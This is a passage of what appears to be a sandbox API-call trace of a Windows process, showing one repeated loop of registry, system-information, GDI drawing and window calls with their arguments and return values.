lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.291] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.291] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.291] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.291] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.291] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.291] BeginPath (hdc=0x0) returned 0 [0092.291] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.291] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.291] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.291] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.291] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.291] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.291] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.291] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.291] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.291] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.291] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.291] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.291] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.291] BeginPath (hdc=0x0) returned 0 [0092.292] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.292] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.292] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.292] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.292] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.292] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.292] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.292] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.292] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.292] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.292] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.292] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.292] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.292] BeginPath (hdc=0x0) returned 0 [0092.292] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.292] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.292] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.292] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.292] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.292] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.292] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.292] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.292] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.292] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.293] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.293] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.293] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.293] BeginPath (hdc=0x0) returned 0 [0092.293] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.293] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.293] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.293] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.293] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.293] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.293] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.293] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.293] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.293] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.293] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.293] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.293] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.293] BeginPath (hdc=0x0) returned 0 [0092.293] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.293] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.293] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.293] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.293] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.293] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.293] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.293] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.293] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.293] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.294] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.294] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.294] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.294] BeginPath (hdc=0x0) returned 0 [0092.294] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.294] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.294] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.294] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.294] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.294] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.294] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.294] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.294] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.294] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.294] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.294] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.294] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.294] BeginPath (hdc=0x0) returned 0 [0092.294] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.294] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.294] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.294] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.294] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.294] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.294] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.294] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.295] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.295] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.295] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.295] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.295] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.295] BeginPath (hdc=0x0) returned 0 [0092.295] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.295] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.295] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.295] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.295] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.295] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.295] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.295] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.295] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.295] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.295] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.295] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.295] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.295] BeginPath (hdc=0x0) returned 0 [0092.295] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.295] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.295] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.295] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.295] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.295] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.295] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.296] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.296] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.296] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.296] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.296] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.296] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.296] BeginPath (hdc=0x0) returned 0 [0092.296] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.296] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.296] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.296] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.296] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.296] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.296] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.296] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.296] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.296] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.296] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.296] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.296] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.296] BeginPath (hdc=0x0) returned 0 [0092.296] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.296] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.296] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.296] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.296] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.296] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.297] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.297] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.297] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.297] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.297] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.297] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.297] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.297] BeginPath (hdc=0x0) returned 0 [0092.297] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.297] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.297] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.297] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.297] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.297] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.297] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.297] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.297] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.297] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.297] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.297] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.297] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.297] BeginPath (hdc=0x0) returned 0 [0092.297] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.298] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.298] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.298] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.298] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.298] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.298] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.298] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.298] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.298] GetSystemInfo (in: 